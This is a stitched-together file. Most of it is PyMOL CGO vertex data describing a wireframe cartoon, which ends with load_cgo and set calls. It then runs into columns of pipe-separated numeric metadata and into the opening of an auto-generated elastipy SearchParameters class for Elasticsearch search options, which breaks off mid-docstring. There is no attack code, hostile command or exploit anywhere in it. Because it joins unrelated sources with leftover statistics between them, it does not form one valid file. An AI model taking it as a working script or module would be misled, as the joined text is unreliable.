VERTEX, 23.089, 35.662, 35.083,
VERTEX, 22.837, 35.247, 35.061,
VERTEX, 22.995, 35.921, 34.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.837, 35.247, 35.061,
VERTEX, 22.995, 35.921, 34.473,
VERTEX, 22.767, 35.500, 34.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.995, 35.921, 34.473,
VERTEX, 22.767, 35.500, 34.446,
VERTEX, 23.059, 36.171, 33.592,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.767, 35.500, 34.446,
VERTEX, 23.059, 36.171, 33.592,
VERTEX, 22.879, 35.773, 33.576,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.059, 36.171, 33.592,
VERTEX, 22.879, 35.773, 33.576,
VERTEX, 23.244, 36.265, 32.955,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.879, 35.773, 33.576,
VERTEX, 23.244, 36.265, 32.955,
VERTEX, 23.109, 35.904, 32.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.244, 36.265, 32.955,
VERTEX, 23.109, 35.904, 32.961,
VERTEX, 23.442, 36.150, 32.937,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.109, 35.904, 32.961,
VERTEX, 23.442, 36.150, 32.937,
VERTEX, 23.322, 35.818, 32.962,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.442, 36.150, 32.937,
VERTEX, 23.322, 35.818, 32.962,
VERTEX, 23.536, 35.892, 33.547,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.322, 35.818, 32.962,
VERTEX, 23.536, 35.892, 33.547,
VERTEX, 23.393, 35.564, 33.577,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.536, 35.892, 33.547,
VERTEX, 23.393, 35.564, 33.577,
VERTEX, 23.472, 35.642, 34.429,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.393, 35.564, 33.577,
VERTEX, 23.472, 35.642, 34.429,
VERTEX, 23.280, 35.292, 34.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.472, 35.642, 34.429,
VERTEX, 23.280, 35.292, 34.447,
VERTEX, 23.286, 35.547, 35.065,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.280, 35.292, 34.447,
VERTEX, 23.286, 35.547, 35.065,
VERTEX, 23.050, 35.160, 35.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.286, 35.547, 35.065,
VERTEX, 23.050, 35.160, 35.062,
VERTEX, 23.089, 35.662, 35.083,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.050, 35.160, 35.062,
VERTEX, 23.089, 35.662, 35.083,
VERTEX, 22.837, 35.247, 35.061,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.837, 35.247, 35.061,
VERTEX, 22.646, 34.791, 35.032,
VERTEX, 22.767, 35.500, 34.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.646, 34.791, 35.032,
VERTEX, 22.767, 35.500, 34.446,
VERTEX, 22.601, 35.040, 34.412,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.767, 35.500, 34.446,
VERTEX, 22.601, 35.040, 34.412,
VERTEX, 22.879, 35.773, 33.576,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.601, 35.040, 34.412,
VERTEX, 22.879, 35.773, 33.576,
VERTEX, 22.761, 35.342, 33.560,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.879, 35.773, 33.576,
VERTEX, 22.761, 35.342, 33.560,
VERTEX, 23.109, 35.904, 32.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.761, 35.342, 33.560,
VERTEX, 23.109, 35.904, 32.961,
VERTEX, 23.031, 35.518, 32.973,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.109, 35.904, 32.961,
VERTEX, 23.031, 35.518, 32.973,
VERTEX, 23.322, 35.818, 32.962,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.031, 35.518, 32.973,
VERTEX, 23.322, 35.818, 32.962,
VERTEX, 23.254, 35.467, 32.997,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.322, 35.818, 32.962,
VERTEX, 23.254, 35.467, 32.997,
VERTEX, 23.393, 35.564, 33.577,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.254, 35.467, 32.997,
VERTEX, 23.393, 35.564, 33.577,
VERTEX, 23.298, 35.218, 33.616,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.393, 35.564, 33.577,
VERTEX, 23.298, 35.218, 33.616,
VERTEX, 23.280, 35.292, 34.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.298, 35.218, 33.616,
VERTEX, 23.280, 35.292, 34.447,
VERTEX, 23.139, 34.916, 34.469,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.280, 35.292, 34.447,
VERTEX, 23.139, 34.916, 34.469,
VERTEX, 23.050, 35.160, 35.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.139, 34.916, 34.469,
VERTEX, 23.050, 35.160, 35.062,
VERTEX, 22.868, 34.740, 35.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.050, 35.160, 35.062,
VERTEX, 22.868, 34.740, 35.056,
VERTEX, 22.837, 35.247, 35.061,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.868, 34.740, 35.056,
VERTEX, 22.837, 35.247, 35.061,
VERTEX, 22.646, 34.791, 35.032,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.646, 34.791, 35.032,
VERTEX, 22.527, 34.297, 35.006,
VERTEX, 22.601, 35.040, 34.412,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.527, 34.297, 35.006,
VERTEX, 22.601, 35.040, 34.412,
VERTEX, 22.514, 34.543, 34.384,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.601, 35.040, 34.412,
VERTEX, 22.514, 34.543, 34.384,
VERTEX, 22.761, 35.342, 33.560,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.514, 34.543, 34.384,
VERTEX, 22.761, 35.342, 33.560,
VERTEX, 22.719, 34.881, 33.554,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.761, 35.342, 33.560,
VERTEX, 22.719, 34.881, 33.554,
VERTEX, 23.031, 35.518, 32.973,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.719, 34.881, 33.554,
VERTEX, 23.031, 35.518, 32.973,
VERTEX, 23.022, 35.113, 33.004,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.031, 35.518, 32.973,
VERTEX, 23.022, 35.113, 33.004,
VERTEX, 23.254, 35.467, 32.997,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.022, 35.113, 33.004,
VERTEX, 23.254, 35.467, 32.997,
VERTEX, 23.246, 35.103, 33.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.254, 35.467, 32.997,
VERTEX, 23.246, 35.103, 33.056,
VERTEX, 23.298, 35.218, 33.616,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.246, 35.103, 33.056,
VERTEX, 23.298, 35.218, 33.616,
VERTEX, 23.259, 34.857, 33.678,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.298, 35.218, 33.616,
VERTEX, 23.259, 34.857, 33.678,
VERTEX, 23.139, 34.916, 34.469,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.259, 34.857, 33.678,
VERTEX, 23.139, 34.916, 34.469,
VERTEX, 23.054, 34.519, 34.507,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.139, 34.916, 34.469,
VERTEX, 23.054, 34.519, 34.507,
VERTEX, 22.868, 34.740, 35.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.054, 34.519, 34.507,
VERTEX, 22.868, 34.740, 35.056,
VERTEX, 22.750, 34.287, 35.057,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.868, 34.740, 35.056,
VERTEX, 22.750, 34.287, 35.057,
VERTEX, 22.646, 34.791, 35.032,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.750, 34.287, 35.057,
VERTEX, 22.646, 34.791, 35.032,
VERTEX, 22.527, 34.297, 35.006,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.527, 34.297, 35.006,
VERTEX, 22.493, 33.770, 34.995,
VERTEX, 22.514, 34.543, 34.384,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.493, 33.770, 34.995,
VERTEX, 22.514, 34.543, 34.384,
VERTEX, 22.519, 34.018, 34.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.514, 34.543, 34.384,
VERTEX, 22.519, 34.018, 34.373,
VERTEX, 22.719, 34.881, 33.554,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.519, 34.018, 34.373,
VERTEX, 22.719, 34.881, 33.554,
VERTEX, 22.767, 34.400, 33.576,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.719, 34.881, 33.554,
VERTEX, 22.767, 34.400, 33.576,
VERTEX, 23.022, 35.113, 33.004,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.767, 34.400, 33.576,
VERTEX, 23.022, 35.113, 33.004,
VERTEX, 23.093, 34.693, 33.070,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.022, 35.113, 33.004,
VERTEX, 23.093, 34.693, 33.070,
VERTEX, 23.246, 35.103, 33.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.093, 34.693, 33.070,
VERTEX, 23.246, 35.103, 33.056,
VERTEX, 23.305, 34.726, 33.151,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.246, 35.103, 33.056,
VERTEX, 23.305, 34.726, 33.151,
VERTEX, 23.259, 34.857, 33.678,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.305, 34.726, 33.151,
VERTEX, 23.259, 34.857, 33.678,
VERTEX, 23.279, 34.478, 33.773,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.259, 34.857, 33.678,
VERTEX, 23.279, 34.478, 33.773,
VERTEX, 23.054, 34.519, 34.507,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.279, 34.478, 33.773,
VERTEX, 23.054, 34.519, 34.507,
VERTEX, 23.031, 34.096, 34.570,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.054, 34.519, 34.507,
VERTEX, 23.031, 34.096, 34.570,
VERTEX, 22.750, 34.287, 35.057,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.031, 34.096, 34.570,
VERTEX, 22.750, 34.287, 35.057,
VERTEX, 22.705, 33.803, 35.076,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.750, 34.287, 35.057,
VERTEX, 22.705, 33.803, 35.076,
VERTEX, 22.527, 34.297, 35.006,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.705, 33.803, 35.076,
VERTEX, 22.527, 34.297, 35.006,
VERTEX, 22.493, 33.770, 34.995,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.493, 33.770, 34.995,
VERTEX, 22.556, 33.266, 34.956,
VERTEX, 22.519, 34.018, 34.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.556, 33.266, 34.956,
VERTEX, 22.519, 34.018, 34.373,
VERTEX, 22.622, 33.527, 34.343,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.519, 34.018, 34.373,
VERTEX, 22.622, 33.527, 34.343,
VERTEX, 22.767, 34.400, 33.576,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.622, 33.527, 34.343,
VERTEX, 22.767, 34.400, 33.576,
VERTEX, 22.907, 33.959, 33.584,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.767, 34.400, 33.576,
VERTEX, 22.907, 33.959, 33.584,
VERTEX, 23.093, 34.693, 33.070,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.907, 33.959, 33.584,
VERTEX, 23.093, 34.693, 33.070,
VERTEX, 23.245, 34.309, 33.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.093, 34.693, 33.070,
VERTEX, 23.245, 34.309, 33.125,
VERTEX, 23.305, 34.726, 33.151,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.245, 34.309, 33.125,
VERTEX, 23.305, 34.726, 33.151,
VERTEX, 23.438, 34.372, 33.233,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.305, 34.726, 33.151,
VERTEX, 23.438, 34.372, 33.233,
VERTEX, 23.279, 34.478, 33.773,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.438, 34.372, 33.233,
VERTEX, 23.279, 34.478, 33.773,
VERTEX, 23.372, 34.112, 33.846,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.279, 34.478, 33.773,
VERTEX, 23.372, 34.112, 33.846,
VERTEX, 23.031, 34.096, 34.570,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.372, 34.112, 33.846,
VERTEX, 23.031, 34.096, 34.570,
VERTEX, 23.086, 33.680, 34.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.031, 34.096, 34.570,
VERTEX, 23.086, 33.680, 34.605,
VERTEX, 22.705, 33.803, 35.076,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.086, 33.680, 34.605,
VERTEX, 22.705, 33.803, 35.076,
VERTEX, 22.748, 33.330, 35.064,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.705, 33.803, 35.076,
VERTEX, 22.748, 33.330, 35.064,
VERTEX, 22.493, 33.770, 34.995,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.748, 33.330, 35.064,
VERTEX, 22.493, 33.770, 34.995,
VERTEX, 22.556, 33.266, 34.956,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.556, 33.266, 34.956,
VERTEX, 22.991, 33.266, 34.206,
VERTEX, 22.622, 33.527, 34.343,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.991, 33.266, 34.206,
VERTEX, 22.622, 33.527, 34.343,
VERTEX, 22.925, 33.294, 33.988,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.622, 33.527, 34.343,
VERTEX, 22.925, 33.294, 33.988,
VERTEX, 22.907, 33.959, 33.584,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.925, 33.294, 33.988,
VERTEX, 22.907, 33.959, 33.584,
VERTEX, 23.004, 33.415, 33.809,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.907, 33.959, 33.584,
VERTEX, 23.004, 33.415, 33.809,
VERTEX, 23.245, 34.309, 33.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.004, 33.415, 33.809,
VERTEX, 23.245, 34.309, 33.125,
VERTEX, 23.181, 33.557, 33.774,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.245, 34.309, 33.125,
VERTEX, 23.181, 33.557, 33.774,
VERTEX, 23.438, 34.372, 33.233,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.181, 33.557, 33.774,
VERTEX, 23.438, 34.372, 33.233,
VERTEX, 23.352, 33.638, 33.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.438, 34.372, 33.233,
VERTEX, 23.352, 33.638, 33.904,
VERTEX, 23.372, 34.112, 33.846,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.352, 33.638, 33.904,
VERTEX, 23.372, 34.112, 33.846,
VERTEX, 23.418, 33.610, 34.122,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.372, 34.112, 33.846,
VERTEX, 23.418, 33.610, 34.122,
VERTEX, 23.086, 33.680, 34.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.418, 33.610, 34.122,
VERTEX, 23.086, 33.680, 34.605,
VERTEX, 23.339, 33.489, 34.301,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.086, 33.680, 34.605,
VERTEX, 23.339, 33.489, 34.301,
VERTEX, 22.748, 33.330, 35.064,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.339, 33.489, 34.301,
VERTEX, 22.748, 33.330, 35.064,
VERTEX, 23.162, 33.347, 34.336,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.748, 33.330, 35.064,
VERTEX, 23.162, 33.347, 34.336,
VERTEX, 22.556, 33.266, 34.956,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.162, 33.347, 34.336,
VERTEX, 22.556, 33.266, 34.956,
VERTEX, 22.991, 33.266, 34.206,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.991, 33.266, 34.206,
VERTEX, 23.233, 32.930, 34.104,
VERTEX, 22.925, 33.294, 33.988,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.233, 32.930, 34.104,
VERTEX, 22.925, 33.294, 33.988,
VERTEX, 23.185, 32.961, 33.882,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.925, 33.294, 33.988,
VERTEX, 23.185, 32.961, 33.882,
VERTEX, 23.004, 33.415, 33.809,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.185, 32.961, 33.882,
VERTEX, 23.004, 33.415, 33.809,
VERTEX, 23.269, 33.094, 33.714,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.004, 33.415, 33.809,
VERTEX, 23.269, 33.094, 33.714,
VERTEX, 23.181, 33.557, 33.774,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.269, 33.094, 33.714,
VERTEX, 23.181, 33.557, 33.774,
VERTEX, 23.435, 33.252, 33.700,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.181, 33.557, 33.774,
VERTEX, 23.435, 33.252, 33.700,
VERTEX, 23.352, 33.638, 33.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.435, 33.252, 33.700,
VERTEX, 23.352, 33.638, 33.904,
VERTEX, 23.586, 33.342, 33.848,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.352, 33.638, 33.904,
VERTEX, 23.586, 33.342, 33.848,
VERTEX, 23.418, 33.610, 34.122,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.586, 33.342, 33.848,
VERTEX, 23.418, 33.610, 34.122,
VERTEX, 23.634, 33.312, 34.070,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.418, 33.610, 34.122,
VERTEX, 23.634, 33.312, 34.070,
VERTEX, 23.339, 33.489, 34.301,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.634, 33.312, 34.070,
VERTEX, 23.339, 33.489, 34.301,
VERTEX, 23.550, 33.178, 34.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.339, 33.489, 34.301,
VERTEX, 23.550, 33.178, 34.238,
VERTEX, 23.162, 33.347, 34.336,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.550, 33.178, 34.238,
VERTEX, 23.162, 33.347, 34.336,
VERTEX, 23.384, 33.021, 34.252,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.162, 33.347, 34.336,
VERTEX, 23.384, 33.021, 34.252,
VERTEX, 22.991, 33.266, 34.206,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.384, 33.021, 34.252,
VERTEX, 22.991, 33.266, 34.206,
VERTEX, 23.233, 32.930, 34.104,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.233, 32.930, 34.104,
VERTEX, 23.525, 32.640, 33.984,
VERTEX, 23.185, 32.961, 33.882,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.525, 32.640, 33.984,
VERTEX, 23.185, 32.961, 33.882,
VERTEX, 23.494, 32.676, 33.759,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.185, 32.961, 33.882,
VERTEX, 23.494, 32.676, 33.759,
VERTEX, 23.269, 33.094, 33.714,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.494, 32.676, 33.759,
VERTEX, 23.269, 33.094, 33.714,
VERTEX, 23.581, 32.821, 33.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.269, 33.094, 33.714,
VERTEX, 23.581, 32.821, 33.605,
VERTEX, 23.435, 33.252, 33.700,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.581, 32.821, 33.605,
VERTEX, 23.435, 33.252, 33.700,
VERTEX, 23.735, 32.991, 33.610,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.435, 33.252, 33.700,
VERTEX, 23.735, 32.991, 33.610,
VERTEX, 23.586, 33.342, 33.848,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.735, 32.991, 33.610,
VERTEX, 23.586, 33.342, 33.848,
VERTEX, 23.867, 33.086, 33.773,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.586, 33.342, 33.848,
VERTEX, 23.867, 33.086, 33.773,
VERTEX, 23.634, 33.312, 34.070,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.867, 33.086, 33.773,
VERTEX, 23.634, 33.312, 34.070,
VERTEX, 23.898, 33.050, 33.997,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.634, 33.312, 34.070,
VERTEX, 23.898, 33.050, 33.997,
VERTEX, 23.550, 33.178, 34.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.898, 33.050, 33.997,
VERTEX, 23.550, 33.178, 34.238,
VERTEX, 23.811, 32.904, 34.152,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.550, 33.178, 34.238,
VERTEX, 23.811, 32.904, 34.152,
VERTEX, 23.384, 33.021, 34.252,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.811, 32.904, 34.152,
VERTEX, 23.384, 33.021, 34.252,
VERTEX, 23.657, 32.734, 34.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.384, 33.021, 34.252,
VERTEX, 23.657, 32.734, 34.147,
VERTEX, 23.233, 32.930, 34.104,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.657, 32.734, 34.147,
VERTEX, 23.233, 32.930, 34.104,
VERTEX, 23.525, 32.640, 33.984,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.525, 32.640, 33.984,
VERTEX, 23.855, 32.384, 33.867,
VERTEX, 23.494, 32.676, 33.759,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.855, 32.384, 33.867,
VERTEX, 23.494, 32.676, 33.759,
VERTEX, 23.840, 32.427, 33.642,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.494, 32.676, 33.759,
VERTEX, 23.840, 32.427, 33.642,
VERTEX, 23.581, 32.821, 33.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.840, 32.427, 33.642,
VERTEX, 23.581, 32.821, 33.605,
VERTEX, 23.928, 32.584, 33.500,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.581, 32.821, 33.605,
VERTEX, 23.928, 32.584, 33.500,
VERTEX, 23.735, 32.991, 33.610,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.928, 32.584, 33.500,
VERTEX, 23.735, 32.991, 33.610,
VERTEX, 24.069, 32.764, 33.524,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.735, 32.991, 33.610,
VERTEX, 24.069, 32.764, 33.524,
VERTEX, 23.867, 33.086, 33.773,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.069, 32.764, 33.524,
VERTEX, 23.867, 33.086, 33.773,
VERTEX, 24.180, 32.861, 33.700,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.867, 33.086, 33.773,
VERTEX, 24.180, 32.861, 33.700,
VERTEX, 23.898, 33.050, 33.997,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.180, 32.861, 33.700,
VERTEX, 23.898, 33.050, 33.997,
VERTEX, 24.195, 32.818, 33.925,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.898, 33.050, 33.997,
VERTEX, 24.195, 32.818, 33.925,
VERTEX, 23.811, 32.904, 34.152,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.195, 32.818, 33.925,
VERTEX, 23.811, 32.904, 34.152,
VERTEX, 24.107, 32.661, 34.067,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.811, 32.904, 34.152,
VERTEX, 24.107, 32.661, 34.067,
VERTEX, 23.657, 32.734, 34.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.107, 32.661, 34.067,
VERTEX, 23.657, 32.734, 34.147,
VERTEX, 23.966, 32.481, 34.043,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.657, 32.734, 34.147,
VERTEX, 23.966, 32.481, 34.043,
VERTEX, 23.525, 32.640, 33.984,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.966, 32.481, 34.043,
VERTEX, 23.525, 32.640, 33.984,
VERTEX, 23.855, 32.384, 33.867,
END,
]
cmd.load_cgo(cartoon_wf, 'cartoon_wf')
cmd.set('two_sided_lighting', 'on')
| 23.766417
| 41
| 0.67168
| 64,135
| 304,733
| 3.151431
| 0.016153
| 0.113993
| 0.164657
| 0.240653
| 0.999218
| 0.998575
| 0.998352
| 0.998095
| 0.997873
| 0.997873
| 0
| 0.431543
| 0.126271
| 304,733
| 12,821
| 42
| 23.768271
| 0.327571
| 0
| 0
| 0.998362
| 0
| 0
| 0.000098
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.000156
| 0
| 0.000156
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
083c0d03c8076693a48cc0fa54ab840e42267ada
| 58,823
|
py
|
Python
|
elastipy/generated_search_param.py
|
defgsus/elastipy
|
c1144ab39fa70571ba0e02ccf41d380a8a1bd730
|
[
"Apache-2.0"
] | 1
|
2021-02-17T17:50:28.000Z
|
2021-02-17T17:50:28.000Z
|
elastipy/generated_search_param.py
|
defgsus/elastipy
|
c1144ab39fa70571ba0e02ccf41d380a8a1bd730
|
[
"Apache-2.0"
] | 2
|
2021-03-29T02:09:41.000Z
|
2022-03-01T20:09:48.000Z
|
elastipy/generated_search_param.py
|
netzkolchose/elastipy
|
c1144ab39fa70571ba0e02ccf41d380a8a1bd730
|
[
"Apache-2.0"
] | null | null | null |
# auto-generated file - do not edit
from datetime import date, datetime
from typing import Mapping, Sequence, Any, Union, Optional
from .search_param import SearchParametersBase
from .search import Search
class Unset:
pass
class SearchParameters(SearchParametersBase):
# make sure sphinx get's the documentation string
__doc__ = SearchParametersBase.__doc__
DEFINITION = {'_source': {'default': True, 'group': 'body'}, '_source_excludes': {'group': 'query'}, '_source_includes': {'group': 'query'}, 'allow_no_indices': {'default': True, 'group': 'query'}, 'allow_partial_search_results': {'default': True, 'group': 'query'}, 'batched_reduce_size': {'default': 512, 'group': 'query'}, 'ccs_minimize_roundtrips': {'default': True, 'group': 'query'}, 'docvalue_fields': {'group': 'body'}, 'expand_wildcards': {'default': 'open', 'group': 'query'}, 'explain': {'default': False, 'group': 'body'}, 'fields': {'group': 'body'}, 'from': {'default': 0, 'group': 'body'}, 'ignore_throttled': {'default': True, 'group': 'query'}, 'ignore_unavailable': {'default': False, 'group': 'query'}, 'indices_boost': {'group': 'body'}, 'max_concurrent_shard_requests': {'default': 5, 'group': 'query'}, 'min_score': {'group': 'body'}, 'pre_filter_shard_size': {'group': 'query'}, 'preference': {'group': 'query'}, 'q': {'group': 'query'}, 'request_cache': {'group': 'query'}, 'rest_total_hits_as_int': {'default': False, 'group': 'query'}, 'routing': {'group': 'query'}, 'scroll': {'group': 'query'}, 'search_type': {'default': 'query_then_fetch', 'group': 'query'}, 'seq_no_primary_term': {'default': False, 'group': 'body'}, 'size': {'default': 10, 'group': 'body'}, 'sort': {'group': 'body'}, 'stats': {'group': 'body'}, 'stored_fields': {'group': 'query'}, 'suggest_field': {'group': 'query'}, 'suggest_text': {'group': 'query'}, 'terminate_after': {'default': 0, 'timeout': {'type': 'str', 'doc': 'Specifies the period of time to wait for a response in\n[time units](https://www.elastic.co/guide/en/elasticsearch/reference/current/common-options.html#time-units).\nIf no response is received before the timeout expires,\nthe request fails and returns an error. Defaults to no timeout.\n'}, 'group': 'body'}, 'timeout': {'group': 'query'}, 'track_scores': {'default': False, 'group': 'query'}, 'track_total_hits': {'default': 10000, 'group': 'query'}, 'typed_keys': {'default': True, 'group': 'query'}, 'version': {'default': False, 'group': 'query'}}
def __call__(
self,
source: Union[bool, str, Sequence] = Unset,
source_excludes: Optional[str] = Unset,
source_includes: Optional[str] = Unset,
allow_no_indices: bool = Unset,
allow_partial_search_results: bool = Unset,
batched_reduce_size: int = Unset,
ccs_minimize_roundtrips: bool = Unset,
docvalue_fields: Optional[Sequence[Union[str, Mapping[str, str]]]] = Unset,
expand_wildcards: str = Unset,
explain: bool = Unset,
fields: Optional[Sequence[Union[str, Mapping[str, str]]]] = Unset,
from_: int = Unset,
ignore_throttled: bool = Unset,
ignore_unavailable: bool = Unset,
indices_boost: Optional[Sequence[Mapping[str, float]]] = Unset,
max_concurrent_shard_requests: int = Unset,
min_score: Optional[float] = Unset,
pre_filter_shard_size: Optional[int] = Unset,
preference: Optional[str] = Unset,
q: Optional[str] = Unset,
request_cache: Optional[bool] = Unset,
rest_total_hits_as_int: bool = Unset,
routing: Optional[str] = Unset,
scroll: Optional[str] = Unset,
search_type: str = Unset,
seq_no_primary_term: bool = Unset,
size: int = Unset,
sort: Optional[Union[str, Sequence[Union[str, Mapping[str, str]]], Mapping[str, str]]] = Unset,
stats: Optional[Sequence[str]] = Unset,
stored_fields: Optional[str] = Unset,
suggest_field: Optional[str] = Unset,
suggest_text: Optional[str] = Unset,
terminate_after: int = Unset,
timeout: Optional[str] = Unset,
track_scores: bool = Unset,
track_total_hits: Union[int, bool] = Unset,
typed_keys: bool = Unset,
version: bool = Unset,
) -> Search:
"""
Can set all search parameters at once.
Each parameter that is different than it's default value is put into the
search request.
The parameters are automatically split into query and body representation.
:param source: ``Union[bool, str, Sequence]``
Indicates which `source fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-source-field.html>`__
